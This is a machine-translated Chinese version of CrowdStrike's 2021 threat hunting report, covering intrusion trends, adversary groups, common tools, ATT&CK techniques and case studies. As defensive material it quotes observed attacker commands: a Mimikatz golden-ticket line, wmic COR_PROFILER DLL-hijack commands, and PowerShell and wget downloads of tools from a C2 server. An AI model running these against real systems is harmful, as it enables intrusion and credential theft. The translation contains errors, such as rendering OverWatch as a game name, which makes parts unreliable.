CS威胁狩猎白皮书——威胁图、TTP情报(提供攻击者信息)、基于ATT&CK的APT挖掘,目标就是根据异常发现攻击者组织和攻击全景图
https://www.crowdstrike.com/resources/reports/threat-hunting-report-2021/
google翻译,要点做了标记。
Falcon OverWatchTM 是 CrowdStrike 吗? 基于 CrowdStrike Falcon 的托管威胁搜寻服务平台。 OverWatch 会在 24/7/365 的基础上进行全面的人工分析,以不懈地寻找旨在逃避其他检测技术的异常或新颖的攻击者手段。 OverWatch 是一支利用 CrowdStrike Threat Graph 强大功能的跨学科精英团队? 数据库,丰富了 CrowdStrike 威胁情报,以不断寻找客户环境中的威胁活动。 凭借每天收集的超过 1 万亿个端点相关事件的云级遥测数据,以及 160 多个对手团体的详细交易技巧,OverWatch 拥有无与伦比的能力来查看和阻止最复杂的威胁——让对手无处可躲。 1 1 有关 Falcon OverWatch 如何执行其任务的更多信息,请参阅 https://www.crowdstrike.com/endpoint-security-products/falcon-overwatch-threat-hunting/。
又一年,OverWatch 通过及早识别恶意活动并阻止攻击者,打破了创纪录数量的交互式入侵尝试2。本报告分享了 OverWatch 从 2020 年 7 月 1 日到 2021 年 6 月 30 日的全天候威胁追踪的见解。3 今年的报告首先仔细研究了 OverWatch 涵盖观察到的交互式威胁行为者行为的广泛数据集,我们将在本报告中提及这些数据集作为“入侵活动”。它使用这些数据来检查威胁行为者如何在受害者环境中运作,重点介绍攻击者正在使用的罕见和常见技术。 OverWatch 的使命是利用人类专业知识增强 Falcon 平台强大的自主保护能力。凭借人类独创性和受专利保护的工作流程的综合力量,OverWatch 系统性地筛选了 1 万亿个日常事件,以发现潜在的实际入侵,平均每 8 分钟一次。 OverWatch 以快速、大规模的方式运行,以近乎实时的方式将恶意活动通知受害组织,确保在违规之前识别并中断包含新型交易的入侵尝试。今年报告的主要发现包括: OverWatch 追踪到去年交互式入侵活动增加了 60%。动手入侵活动的威胁仍然非常真实——OverWatch 已经观察到并破坏了跨越所有垂直行业和地理区域的入侵。对手已经超越了恶意软件。他们正在使用越来越复杂和隐蔽的技术来逃避自主检测——在 CrowdStrike Threat Graph 索引的所有检测中?在过去三个月中,68% 没有恶意软件。 ECrime 继续主导威胁领域,占交互式入侵活动的 75%。其驱动因素之一是不断发展的大型游戏狩猎 (BGH) 商业模式,该模式已广泛采用使用访问代理来促进访问和使用专用泄漏站点来提取付款。 ECrime 的对手正在以越来越快的速度追求他们的目标。 OverWatch 观察表明,它们能够在平均 1 小时 32 分钟内在受害者环境中横向移动。有针对性的入侵对手仍然是一个突出的威胁,特别是对于电信行业。虽然各种规模和所有垂直领域的组织都有可能成为目标,但电信行业今年脱颖而出,占 OverWatch 在过去 12 个月观察到的所有状态关系入侵活动的 40%。
这份报告包含详细的案例研究,分享对 OverWatch 每天跟踪的动手活动的见解,并为希望加强其安全计划的防御者提供建议。 请注意,本报告的调查结果与 OverWatch 跟踪的交互式(即动手)针对性入侵 4 和电子犯罪入侵有关,并不一定代表 OverWatch 或 Falcon 平台阻止的所有攻击。 此外,术语“入侵”用于描述 OverWatch 在受害者环境中发现的任何恶意交互活动。 “入侵”一词并非“安全漏洞”的同义词,不应理解为威胁行为者能够实现其目标。
CrowdStrike Falcon 平台已在数十项独立测试中明确证明是保护端点免受现代威胁的高效解决方案。尽管如此,没有任何技术可以 100% 有效地阻止确定的入侵者。根据 Threat Graph 索引的客户群数据,过去三个月中 68% 的检测不是基于恶意软件的。攻击者越来越多地尝试在不向端点写入恶意软件的情况下,使用合法凭证和内置工具(生活在陆地上)来实现他们的目标——这是故意逃避传统防病毒产品检测的努力。 OverWatch 的使命是发现技术本身无法发现的威胁。威胁搜寻发生在对手和防御者之间战斗的前线。每年《守望先锋》都会看到更多的对手、新的贸易手段和更快的入侵。在这种情况下,找到威胁只是成功的一半;使用这些洞察力大规模破坏对手是赢得战斗的关键。在 2020 年 7 月 1 日至 2021 年 6 月 30 日的 12 个月内,OverWatch 的人类威胁猎人直接识别了超过 65,000 次潜在入侵,或大约每 8 分钟发现 1 次潜在入侵——一年 365 天、一天 24 小时。这代表了数千个案例,其中 OverWatch 分析师发现了积极寻求逃避自主检测技术的对手。考虑到攻击者在几分钟内开始在受害环境中移动的能力(本报告中显示),这些数字说明了持续威胁搜寻的重要性。 OverWatch 的使命是发现技术本身无法发现的威胁。 6 持续威胁追踪的价值 在 Falcon OverWatch 的帮助下识别并阻止了 65,000 次潜在入侵 8 分钟是 OverWatch 威胁追踪者发现潜在入侵的平均间隔。
至关重要的是,这些潜在的入侵中的每一个也代表了推进 Falcon 平台自主检测技术的机会。 每次通过 OverWatch SEARCH 威胁搜寻周期时,猎人都会磨练 Falcon 平台更快、更自主地检测类似入侵的能力。 去年,威胁猎手将他们的发现提炼成数百种基于行为的新预防措施的开发,从而直接预防了大约 248,000 个独特端点上的恶意活动。 这些基于行为的预防措施增强了 Falcon 平台的能力,以更快的速度和规模发现新的对手行为。 借助正确的数据和工具,一小群专家不仅可以阻止当今最复杂的入侵,还可以开发洞察力,推动安全组织各个级别的持续进步。
OverWatch 发现了技术本身无法发现的威胁。 人类主导的威胁狩猎并没有取代自主检测技术——相反,它明确地着手补充和增强基于技术的防御,以确保防御者拥有人类智慧的力量。 OverWatch 威胁追踪者采用如下所述的“SEARCH”追踪方法来系统地大规模检测威胁。 OverWatch 威胁猎人全天候工作,有条不紊地筛选未知的未知世界,以找到最微弱的恶意活动痕迹,并近乎实时地向 CrowdStrike 客户提供可操作的分析。 OverWatch SEARCH 方法可以照亮客户环境中最黑暗的角落——让对手无处可躲。
CrowdStrike 丰富的遥测技术为 OverWatch 威胁追踪奠定了基础。 Falcon 平台每天收集多达 1 万亿个事件,包括来自数百万个端点的数百种事件类型,并对其进行编目,以提供对整个 CrowdStrike 安装群活动的全面可见性。 CrowdStrike 的专有威胁图将事件情境化并实时揭示数据点之间的关系。威胁猎手利用 CrowdStrike 关于 160 多个对手团体的最新威胁情报,以及利用他们对战术、技术和程序 (TTP) 的深入工作知识,为数据添加了更多维度) 在野外使用。所有这一切都以 OverWatch 的专有工具和流程为基础,确保每一次狩猎都经过优化以实现最高效率。 OverWatch 分析师使用受专利保护的狩猎工作流程和复杂的统计方法来识别异常活动。这得到了对对手行为和动机的深刻理解的支持,使团队能够形成关于对手可能会在哪里发动攻击的假设。 OverWatch 团队的经验广度和深度都是世界一流的,代表来自公共和私营行业的各个角落。此外,该团队正在不断建立其知识库,24/7/365 与前线的对手进行正面交锋。为了对对手采取行动,了解威胁的全部性质至关重要。在短短几分钟内,OverWatch 分析师重建威胁活动,将其从数据点集合转化为清晰的故事。这些信息使组织不仅能够进行补救,还能够填补其环境中的漏洞。时间是防止入侵变成破坏的关键。 OverWatch 作为 Falcon 平台的原生组件运行。通过 Falcon,OverWatch 近乎实时地提供关于潜在恶意活动的清晰、准确和可操作的信息,使组织能够快速果断地做出响应,而不会出现摩擦。对于每个新威胁,OverWatch 都会提取新的见解,以推动自动检测和人类威胁搜寻的持续进步。该团队一直在微调其技能和流程,以始终领先对手一步。
入侵活动数量 在过去的一年中,OverWatch 追踪到交互式入侵活动的数量稳步增加。与去年同期相比,OverWatch 观察到活动数量增加了近 60%。在最近一个季度,即 2021 年 4 月至 6 月,OverWatch 发现的入侵活动比任何其他季度都多。敌手动机 又一年,出于经济动机的电子犯罪活动主导了 OverWatch 跟踪的交互式入侵尝试。 ECrime 占交互式入侵活动的 75%,而有针对性的入侵占 24%,其余 1% 归因于黑客活动。电子犯罪 出于经济动机的犯罪入侵活动 有针对性的国家赞助的入侵活动,包括网络间谍活动、国家关系破坏攻击和货币生成以支持一个政权上一年的活动分布。看到这些数字趋于稳定表明,在几年的电子犯罪活动相对于有针对性的入侵迅速扩张后,电子犯罪和有针对性的入侵活动的分布可能会达到平衡。
电子犯罪
有迹象表明,电子犯罪的对手可能会变得更有能力,特别是如果以他们在受害者环境中移动的速度来衡量的话。 OverWatch 测量突破时间——攻击者从最初受感染的主机横向移动到受害环境中的另一台主机所花费的时间。在 2020 年 7 月 1 日至 2021 年 6 月 30 日期间可以推导出突破时间的实际电子犯罪入侵活动中,平均时间仅为 1 小时 32 分钟。此外,OverWatch 团队发现,在 36% 的入侵中,攻击者能够在不到 30 分钟的时间内横向移动到其他主机。 ECrime 的对手也在不断创新和发展他们的商业模式,以增加他们成功的机会。大多数从事大型游戏狩猎 (BGH) 活动的勒索软件运营商现在都采用数据泄露威胁和数据加密作为从受害者那里获取报酬的手段。许多攻击者还建立了专门的泄密站点 (DLS) 作为一个论坛来公布受害者的详细信息并发布被盗数据。 INDRIK SPIDER 是这种使用数据勒索趋势的例外。过去 12 个月电子犯罪威胁格局的另一个特点是访问代理的重要性日益增加,他们在促进其他电子犯罪参与者进行入侵方面发挥作用。本报告中的 In Pursuit of PROPHET 专题介绍了访问代理的运行情况。
OverWatch 还记录到,交互式入侵中的加密劫持实例同比增长了 100%。这可能是由于从 2020 年末开始的加密货币价值急剧增加。电子犯罪活动的增长潜力几乎是无限的,这是由新的参与者、新的漏洞或组织在维护基本安全卫生方面的失败推动的。虽然 OverWatch 确实看到过去 12 个月的电子犯罪入侵尝试数量有所增加,但这种增长并没有像前几年那样超过目标入侵活动的增长。可能阻止电子犯罪活动迅速加速的一个因素是执法部门成功干预对手控制的基础设施和资源。这些努力触及了几个著名的电子犯罪组织的运作,包括 WIZARD SPIDER、MUMMY SPIDER、CIRCUS SPIDER、GRACEFUL SPIDER、TWISTED SPIDER 和 CARBON SPIDER。然而,执法活动似乎只是暂时扰乱了电子犯罪活动,而不是完全停止运作。对手通过快速激活新的 C2 基础设施并使其工具集多样化,表现出了弹性。有 针对性的入侵 一般来说,来自中华人民共和国(!!!)、朝鲜民主主义人民共和国(朝鲜,又名朝鲜)和伊朗伊斯兰共和国的对手团体是大多数有针对性的入侵 5 活动 OverWatch 跟踪的来源。然而,在过去的一年里,OverWatch 还追踪到了不归因于指定演员团体的可疑国家关联活动的上升。 在截至 2021 年 6 月 30 日的一年中,中国与国家关系的对手(又名 PANDA)保持了高作战节奏,并以知识产权 (IP) 盗窃和情报收集目标为动机开展了持续而广泛的运动。 PANDA 是在此期间 OverWatch 威胁猎人最常发现的有针对性的入侵对手之一。 2021 年初的一个显着发展是疑似与中国联系的对手大规模利用 Microsoft Exchange Server 漏洞。这提醒人们注意与中国有关的参与者的各种技能,并强调发现和利用新漏洞的威胁始终存在。本报告后面的一个故事 — OverWatch 使用 Falcon Complete 破坏 Microsoft Exchange 零日漏洞利用 — 研究了 CrowdStrike 的托管服务如何协同工作以破坏和驱逐一种如yetunname 的威胁。 OverWatch 追踪了相对一致的朝鲜活动水平(CHOLLIMA)。 CrowdStrike Intelligence 报告称,朝鲜演员——包括过去 12 个月被 OverWatch 追踪的两名演员,LABYRINTH CHOLLIMA 和 SILENT CHOLLIMA——继续对其工具集进行迭代更新和改进。本报告后面的一个入侵故事——(并非如此)SILENT CHOLLIMA 入侵中的自定义工具响铃警报——揭示了一些这种自定义工具是如何在野外使用的。与观察到的中国与朝鲜的对手活动相反,《守望先锋》看到伊朗 (KITTENs) 的活动有所下降。 CrowdStrike Intelligence 报告称,在 2020 年,伊朗观察到的许多入侵活动都集中在与地缘政治和国内问题相关的目标上;这可能导致 OverWatch 看到的活动减少。 OverWatch 还发现了一些具有状态关系活动所有特征的入侵活动,但目前不能将其归因于 CrowdStrike Intelligence 跟踪的任何指定的对手团体。该活动的大部分目标是电信行业,本报告后面的信号干扰功能中对此进行了详细探讨。归因于多样化和全球分散的任务集群的活动增加强调了当前威胁格局中存在的各种有针对性的入侵威胁。 Hacktivism Hacktivism 仅占 OverWatch 跟踪的交互活动的一小部分。守望先锋看到的所有黑客活动都归因于一个单一的敌对组织——FRONTLINE JACKAL,这是一个伊朗民族主义黑客组织,以破坏网站并针对美国、以色列和沙特阿拉伯组织开展其他破坏性在线活动而闻名。 OverWatch 观察到的对手活动为 CrowdStrike Intelligence 提供了对该组操作程序的额外可见性。 按行业垂直划分的入侵 图 3 显示了在 2020 年 7 月至 2021 年 6 月期间 OverWatch 发现的交互式入侵活动中最频繁出现的前 10 个垂直行业。同样的 10 个行业也构成了从 7 月开始的 12 个月期间的前 10 名2019 年至 2020 年 6 月。值得注意的是,科技行业在过去三年中一直位居榜首。 图 3. 该图显示了哪些垂直行业最常受到交互式入侵的影响,还显示了相对于 2019 年 7 月至 2020 年 6 月期间的任何变化 虽然图 3 显示了 OverWatch 数据中针对特定行业的入侵活动的普遍性,但确实如此没有说明入侵数量的显着整体增长。正如本报告开头所指出的,OverWatch 观察到的总入侵活动同比增长了约 60% — 前 10 名列表中的几个行业的入侵活动增长超过了这一增长速度。对 OverWatch 观察到的入侵尝试总数的逐年比较发现,针对电信和零售行业的入侵增加了一倍多。专业服务行业的交互式入侵数量增长了 90% 以上,而政府和学术部门的入侵数量增长了 80% 以上。当数据按威胁类型分类时,顶级行业的排名会发生变化,特别是有针对性的入侵与电子犯罪活动。图 4 分别显示了受目标入侵和电子犯罪对手实施的交互式入侵影响最频繁的前五个行业。 图 4. 受目标入侵影响最频繁的垂直行业与电子犯罪威胁参与者的比较。 2020 年 7 月至 2021 年 6 月,在截至 2021 年 6 月 30 日的 12 个月内,电信行业占 OverWatch 发现的所有目标入侵活动的 40%,在本报告后面的信号干扰功能中进行了详细探讨。 目标入侵“前 5 名”中的其他值得注意的包括医疗保健和学术行业,它们在报告期内成为持续攻击的受害者,特别是由于他们参与了 COVID-19 相关研究。 6 相比之下,ECrime 入侵更多 均匀分布在垂直行业。 这表明许多电子犯罪活动的机会主义性质,这导致活动在不同的垂直行业中更广泛地传播。对手活动
在截至 2021 年 6 月 30 日的一年中,OverWatch 发现了由 30 个不同的命名威胁行为者团体进行的交互式入侵活动。此外,威胁猎手还发现了大量疑似电子犯罪或有针对性的入侵活动,但并未与特定团体具体关联。图 5 提供了 OverWatch 观察到的对手的细分。迄今为止,ECrime 活动在垂直行业中最为普遍,其次是 PANDA 攻击者进行的入侵。 OverWatch 发现了 13 个名为 eCrime(又名 SPIDER)的对手组织的活动。在这些组中,WIZARD SPIDER7 是最多产的,其入侵尝试次数几乎是 OverWatch 观察到的任何其他 eCrime 组的两倍。 WIZARD SPIDER 在超过一半的入侵中部署了 Cobalt Strike Beacon;其他常见工具包括 Ryuk 勒索软件、Windows 后门访问工具 BazarLoader 和 Active Directory 发现工具 AdFind。对于有针对性的入侵活动,归因于中华人民共和国(又名 PANDA)参与者的入侵是最常见的。 OverWatch 发现了八个独立的中国关系对手的入侵企图,其中 WICKED PANDA8 是最活跃的。 WICKED PANDA 还经常使用定制加载器(例如 AttachLoader)部署 Cobalt Strike,同时还部署自定义 Winnti、ShadowPad 和 RouterGod 后门。关于图 5 中显示的数据的一些注意事项:热图表示特定垂直领域内活跃的不同参与者的数量。热图不代表垂直内的入侵尝试总数,因为同一对手组的多次入侵仅表示一次。归因于高度的置信度并不总是可能的。此表不反映任何垂直行业中发生的任何未归因活动。此图表中未列出的垂直行业表明,在此期间,OverWatch 没有记录任何可归因于特定攻击者群体的入侵。
技术和工具:仔细观察 在最常观察到的技术中并没有什么意外。事实上,图 6 中的热图清楚地表明,久经考验的技术是 OverWatch 观察到的大部分恶意交互活动的基础。因此,热图可以作为防御者的指南,突出他们应该优先考虑哪些重点领域,以获得最佳的时间和资源投资回报。例如,建立跨发现技术的狩猎能力可以产生显着的红利。当威胁参与者建立立足点时,他们通常会开始发现过程,以更好地了解受害组织的域、用户帐户和系统配置。无论威胁行为者的最终意图如何,这通常都是正确的。发现是计划下一步行动的重要步骤,无论是横向移动、收集还是渗漏。由于许多发现活动完全属于企业环境中的“正常”管理行为,因此通过工具和人类专业知识来增强任何搜寻线索至关重要,这将过滤掉可能的误报。猎人应该通过关注在短时间内触发多个不同的发现狩猎线索的情况来优先考虑他们的狩猎线索的结果。突然“爆发”的发现行动可能与管理员或普通用户形成对比,并且通常反映了对手迅速试图在网络中定位自己。 Ingress Tool Transfer 是 OverWatch 最常观察到的另一种技术。因此,防御者和猎人了解威胁行为者最常使用哪些工具是有益的。表 1 显示了目标入侵和电子犯罪行为者常用的工具列表,以及每个群体专门使用的顶级工具。表 1. 目标入侵和电子犯罪对手常用的工具,2020 年 7 月至 2021 年 6 月 目标入侵活动和电子犯罪入侵常用的 5 大工具 电子犯罪入侵独有的工具 目标入侵活动独有
Top 5 Tools
Common to Targeted
Intrusion Activity and
eCrime Intrusions
Unique to eCrime Intrusions
Unique to Targeted Intrusion
Activity
1. Mimikatz 1. NS.exe (and name variants) 1. nmap
2. Cobalt Strike Beacon 2. GMER 2. dirtycow
3. PsExec 3. Process Hacker 3. Tiny Shell (tshd)
4. ProcDump 4. Defender Control 4. OpenSSH
5. Advanced IP Scanner 5. Dharma 5. Fatedier
顶级独特技术:有针对性的入侵和电子犯罪 除了综合查看最常见的技术之外,考虑每种威胁类型独有的顶级技术也很有趣。这里的数据支持 OverWatch 对对手动机和交易技巧的预期。有针对性的入侵 T1070.006 主机上的防御规避指标删除:Timestomp T1574 持久性特权升级防御规避劫持执行流程 T1048 替代协议的渗漏渗漏 T1056 收集凭据访问输入捕获 T1070.003 主机上的防御规避指示符删除历史记录影响清除命令 T1048资源劫持 T1055.001 提权防御规避流程注入:动态链接库注入 T1110.001 凭证访问蛮力:密码猜测 T1189 初始访问驱动妥协 T1484 提权防御规避域策略修改技术针对固有攻击者利用更隐蔽并专注于长期访问,例如主机上的指示器删除和清除命令历史记录。此外,在替代协议上使用输入捕获和渗透是情报收集目标的说明。另一方面,如蛮力和驱动妥协技术所证明的那样,电子犯罪参与者在他们的目标上是机会主义的。财务动机也很明显,因为最近几个月加密劫持活动的增加已将资源劫持牢牢地列在这个列表中。
预料之外的情况:强调需要全面狩猎能力的五种不常见技术 到目前为止的分析已经检查了 OverWatch 数据中最突出的技术。然而,在防御对手在其行动中采用的不太流行的技术时,威胁狩猎真正发挥了作用。下面的分析检查了 OverWatch 威胁猎人在过去一年观察到的活动中发现的一些罕见且值得注意的技术。使用替代身份验证材料:传递票证10 T1550.003 一旦攻击者获得了域控制器的访问权限,他们就可以转储具有票证授予权限的域用户的 SID 和 NTLM 哈希,以创建他们自己的 Kerberos 票证,以便在整个域中有效使用. OverWatch 观察到的内容 持续性威胁参与者使用 Mimikatz 使用从域控制器收集的凭据创建黄金票证,并立即将新创建的票证注入他们的会话中以供使用。 Mimikatz 继续出现在 OverWatch 识别的许多入侵尝试中,因为它在转储和利用凭据方面的多功能性使其成为攻击者可以使用的简单而有效的工具。 kerberos::golden /domain:[REDACTED] /sid:[REDACTED] /rc4:[REDACTED] /user:krb /ptt 要使这次攻击成功,攻击者必须已经获得对域控制器的特权访问网络。使用这种技术允许他们为不存在的帐户创建票证,从而混淆他们的访问并可能在网络中保持立足点。(看来域控安全领域也是狩猎的领域之一!!!)
劫持执行流程:COR_PROFILER11 T1574.012 威胁参与者可以修改 COR_PROFILER 环境变量以将恶意 DLL 加载到依赖公共语言运行时的 .NET 进程中。 OverWatch 观察到的内容 一个可疑的 eCrime 攻击者利用了 Windows 服务器上的 Web 服务并下载了许多工具。然后他们使用 WMIC 创建和修改 COR_PROFILER 和 COR_ENABLE_PROFILING 环境变量以加载下载的恶意 DLL 之一。 wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="[REDACTED]",VariableValue="1" wmic ENVIRONMENT create name="COR_PROFILER",username="[REDACTED]",VariableValue="[REDACTED]" 这种技术不仅提供持久性,但如果触发它的 .NET 进程以更高的权限运行,则攻击者 DLL 将在该权限下运行。无论攻击者使用有效的帐户凭据或通过被利用的服务获得对系统的访问权限,此技术都可能提供权限升级而无需进一步获取凭据。
妥协客户端软件二进制文件12 T1554 在获得网络访问权限后,攻击者可以修改客户端软件二进制文件以获得持久性。可以被破坏并用于此目的的客户端软件包括 SSH、FTP、电子邮件客户端和 Web 浏览器。 OverWatch 观察到的内容 在受害者部署 Falcon 之前,疑似状态关联的对手已经破坏了环境。一旦 OverWatch 建立可见性,很明显广告Versary 根深蒂固。威胁猎人观察到攻击者使用有效凭据通过 SSH 访问 Linux 主机。然后,攻击者使用重命名的 tcsh Unix shell 并设置了 setuid 位来提升权限,并安装了替代的 SSH 服务器/客户端,这是 SSH 的修改版本。该软件已被更改以提供秘密记录凭据的功能。虽然攻击者使用现有工具或本地实用程序来实现其目标更为常见,但在某些情况下,修改后的软件可能被证明是攻击者实现其目标的最佳方式。防御者监控软件以确保签名保持有效非常重要。警惕源自客户端应用程序的异常行为也很重要。
云服务发现13 T1526
在获得对网络的初始访问权限后,攻击者可能会尝试对在主机上运行或在环境中启用的云服务进行侦察。由于各种云提供商的服务范围不同,这可以采用多种不同的形式。 OverWatch 观察到的内容 在过去的一年中,OverWatch 观察到专门针对云服务的发现行动有所增加。例如,OverWatch 发现了一个可疑的俄罗斯国家关系对手通过鱼叉式网络钓鱼攻击 Windows 主机。当对手访问系统时,他们最初会进行基本侦察。在这样做时,他们认识到该设备已加入 Azure Active Directory。为了在这个基于 Azure 云的服务上执行额外的发现,他们执行了 dsregcmd /status 命令,该命令提供了与主机加入状态相关的几个细节。 14 虽然这看起来相对简单,但寻找这种类型的行为可能是一个寻找与云服务集成的网络的宝贵线索。由于云服务的快速采用,OverWatch 发现云服务发现活动有所增加,这保证了防御者的更多关注。如前所述,发现活动通常是动手入侵的基础阶段。防御者在调查任何超出其环境中普遍预期的发现活动时应特别警惕。
供应链妥协15 T1195
众所周知,攻击者会以特定组织为目标,这不是作为最终目标,而是作为进入受害者供应链中组织的一种方式。这可以采取在产品交付给最终用户之前恶意修改产品的形式,插入后门或破坏软件以促进恶意软件的后期交付。 OverWatch 观察到的内容 在一家技术公司的环境中部署 Falcon 之后,OverWatch 的猎人发现了深入嵌入的实际入侵的证据。 Hunters 跟踪了该活动,发现攻击者正在使用受损凭据访问内部代码共享存储库。存储库中的源代码用于受害者交付给其客户的合法软件产品。攻击者使用这个受感染的帐户来执行与该存储库相关的发现和文件交互,为他们提供了在交付给最终用户之前恶意操纵软件的潜在机会。在这种情况下,该组织部署 Falcon 以及 OverWatch 主动威胁追踪,证明及时中断了正在进行的主动入侵并防止对目标采取后续行动。正如许多引人注目的案例所证明的那样,供应链妥协可能会产生广泛的影响。在这种情况下,如果 OverWatch 狩猎没有发现对手利用有效帐户访问源代码的微妙尝试,则此受感染软件产品的消费者可能很容易受到攻击。
从开发人员到金钱骡子,需要多个犯罪分子完成广泛的功能才能成功进行勒索软件攻击。在过去的一年中,访问代理在当今多方面的电子犯罪生态系统中发挥了独特的作用。过去一年中一个多产的疑似访问经纪人是被 CrowdStrike Intelligence 追踪为 PROPHET SPIDER 的对手。访问经纪人专门从事破坏网络的工作,目的是将该访问权限出售给其他人。他们的客户使用访问权限来发起他们自己的活动,这些活动越来越多地涉及部署勒索软件。威胁猎手可以通过寻找并破坏试图在网络中立足的访问代理来缩短此 eCrime 供应链。 PROPHET SPIDER 通过破坏易受攻击的 Web 服务器获得初始访问权而赢得了声誉。该 eCrime 攻击者通常以 Oracle WebLogic 服务器为目标,并已观察到利用 CVE-2016-0545、CVE-2020-14882 和 CVE-2020-14750,但 CrowdStrike 也观察到该攻击者针对其他 Web 服务器。为了实现持久性,PROPHET SPIDER 通常会部署各种后门和反向 shell 工具,例如 GOTROJ,这些工具连接到硬编码的命令和控制 (C2) IP 地址。保护对这些受损网络的冗余访问可能是访问经纪人试图增加他们销售的产品的价值的一种尝试。 OverWatch 威胁猎手发现了多次企图入侵多个垂直行业的 PROPHET SPIDER。对一家技术公司的一次特定入侵采用了许多典型的先知蜘蛛策略和技术。通过了解这些行为,防御者可以更好地掌握所需的知识,以便在访问代理使用任何访问进行恶意攻击之前快速中断访问代理。
不受欢迎的先知
OverWatch 最近发现了一家技术公司网络上基于 Windows 的 WebLogic 服务器受到攻击的证据。当发现命令(在本例中为 whoami)在 java.exe 进程(如下图所示)下运行时,威胁猎手会收到潜在不受欢迎的入侵者的警报。攻击者通常会在入侵的早期运行发现命令,因为他们试图在新环境中找到方向。 OverWatch 通知客户并继续跟踪对手,因为他们继续探索环境以寻找线索,以帮助他们加深立足点。攻击者试图发现系统网络配置、16 文件和目录、17 运行进程 18 和域信任。19 然后他们继续检索和安装工具,以帮助他们建立持久性并扩大立足点。随着恶意行为的展开,OverWatch 向受害者组织更新了恶意行为,为该组织的团队提供了必要的详细信息,以防止 PROPHET SPIDER 将访问权交给另一个可能部署勒索软件的对手。
– +
+
WININIT.EXE
服务.EXE
...-3.2.3RSA4.EXE
JAVA程序
命令文件
CONHOST.EXE
呼唤程序
CONHOST.EXE
图 7. 进程树显示在 java.exe 进程下运行的可疑 whoami 命令
特色技术:
入口刀具传输20
该技术的工作原理:在获得对受感染环境的初始访问权限后,攻击者可能会尝试从外部系统检索和安装工具。从外部 C2 服务器传输文件可以通过 FTP、Web 或各种其他协议进行。攻击者为何使用它:有时,攻击者不能仅仅依靠本地工具来扩大立足点或完成入侵。访问其他工具可能是必要的(或者只是更方便)。虽然攻击者可能会使用这种技术来安装恶意软件,但观察他们将其他合法工具转移到受害者环境中的情况并不少见。转移合法实用程序可以扩展攻击者的工具集,而不必触发安全软件检测。此外,在防御者没有定期和持续监控意外文件传输、不常见数据流或导致文件创建的异常外部网络连接的情况下,工具传输可能不会被检测到。威胁追踪提供什么:威胁追踪对于确保攻击者无法在不被注意的情况下将文件传输到受害者网络至关重要。在这次入侵尝试中,PROPHET SPIDER 首先使用 PowerShell 检索 wget 实用程序的 Windows 版本的副本。然后,他们使用 wget 下载了一个 web shell 和一个低流行的扫描工具。 OverWatch 威胁猎人通过主动寻找从外部服务器检索文件的意外进程来捕获此活动。 OverWatch 经常密切关注已知电子犯罪攻击者使用的合法工具的存在。
为什么 Windows 当你可以 Linux 时?
守望先锋接下来观察到的行为揭示了先知蜘蛛的风格和偏好。攻击者执行以下 PowerShell 命令来检索和安装二进制文件:powershell -Command (New-Object System.Net.WebClient).DownloadFile(:443/wget.bin', 'C:\Windows\temp\wget.bin ') 进一步的分析证实,来自其外部 C2 服务器的这个文件是 wget 实用程序的合法 PE 文件版本,可在 Windows 上使用。这是 OverWatch 观察到 PROPHET SPIDER 在 Windows 环境中运行时采取的一种常见方法。通常,他们为初始访问而妥协的服务器是基于 Linux 的,因此在 Windows 机器上重复使用 wget 表明他们倾向于尽可能使用传统的 Linux 工具。
安装 wget.bin 后,攻击者立即将其用于额外的入口工具传输。他们继续安装 7zip 的副本:
c:\windows\temp\7fde\wget.bin -t 1 :443/7z.bin -O
c:\windows\temp\7fde\7z.bin
他们还使用 wget 来检索文件名为 pia.jsp 的 web shell。他们安装的另一个工具是他们选择的扫描仪,一个简单的低流行网络扫描工具,通常称为 pscan。该工具会扫描一个特定端口的一系列 IP 地址。 CrowdStrike 在 PE 和 ELF 版本中都观察到了它,这与 PROPHET SPIDER 专注于针对 Linux 和 Windows 服务器的重点是一致的。在这种情况下,他们使用 pscan 扫描网络以查找端口 445 (SMB) 上的开口,可能是希望横向移动。结论和建议 由于 OverWatch 威胁追踪者对活动的快速发现,客户收到了必要的信息来切断对手的访问,从而阻止 PROPHET SPIDER 使用该网络作为勒索软件运营商的下一个转售机会。有趣的是,攻击者在一个月后返回同一台服务器并尝试执行类似的 TTP。这种毅力说明了 eCrime 对手的决心,因为他们不断成熟并专注于 eCrime 生态系统的各种功能。一个不幸的事实是,入侵很少是一次性事件。21 抵御访问代理机会主义攻击的最佳防御措施是确保您面向外部的服务器已完全修补。然而,预防措施不是灵丹妙药。攻击者甚至可以使用各种技术绕过强大且安全的边界。因此,像 OverWatch 提供的那样主动的威胁追踪也是必不可少的。当威胁猎手有效地搜索您的网络以寻找潜在对手存在的最微妙线索时,他们可以迅速找到异常行为,例如 PROPHET SPIDER 在这次入侵早期使用的异地发现行动。除了寻找意外的侦察外,防御者还应该监控他们的环境以发现潜在的恶意入口工具传输。为了有效地做到这一点,防御者必须持续监控从外部服务器检索文件的意外过程以及不常见的网络数据流。防御者还应该寻找电子犯罪对手喜欢使用的合法工具。防病毒产品通常不会因为这些工具的常见和合法用途而阻止它们,但它们可以作为一个有价值的线索,揭示网络上不受欢迎的用户。
PROPHET SPIDER at a Glance
PROPHET SPIDER is known to target the following verticals.
蜘蛛撒网
对于零售目标 在 2021 年第二季度,一位北美零售员工接到了一个自称是该零售商的销售点 (POS) 供应商的技术支持提供商的个人的电话。按照来电者的指示,该员工将合法的远程访问工具 TeamViewer 下载到店内的所有主机上。正如经常发生的那样,该员工在不知不觉中让未知的对手访问远程管理商店的系统。攻击者使用 TeamViewer 访问多个主机并编写可能的 Prilex POS 恶意软件以及 Ammyy Admin 远程访问软件。 Prilex 恶意软件,主要出现在 eCrime 动机的入侵中,安装额外的恶意二进制文件,通过远程域建立 C2,将自身排除在 Windows Defender 扫描之外,并通过注册表运行键 22 和计划任务创建持久性。 23 尽管该活动是从有效帐户发起的和合法的远程访问软件,OverWatch 检测到低流行的二进制、横向移动和持久性,并向受害组织发出警报。从用户启用访问到尝试持久性和收集 安装 TeamViewer 后,攻击者将他们的工具部署到受感染主机。该工具包括远程管理软件 Ammyy Admin、POS 恶意软件 Prilex 的安装程序和名为 v.bat 的批处理脚本。 Prilex 安装程序被写入 C:\Temp\Gh.exe 并执行。
跟踪检测和响应的足迹
